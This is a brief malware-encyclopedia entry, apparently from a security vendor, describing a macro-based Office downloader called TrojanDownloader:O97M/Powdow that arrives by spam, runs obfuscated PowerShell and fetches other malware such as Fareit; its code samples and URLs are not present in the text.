First posted on 03 November 2017.
There are no other names known for TrojanDownloader:O97M/Powdow.
This threat typically arrives through spam email. It tries to trick users to enable macros. For example:
When the macro is enabled, the obfuscated macro code runs another PowerShell script:
The decrypted PowerShell script looks like:
This PowerShell script will start downloading the final payload from the following URLs:
Downloads other malware
The macro tries to download other malware including PWS:Win32/Fareit.P.
We have seen the following files downloaded from the mentioned URLs:
Analysis by Duc Nguyen
Last update 03 November 2017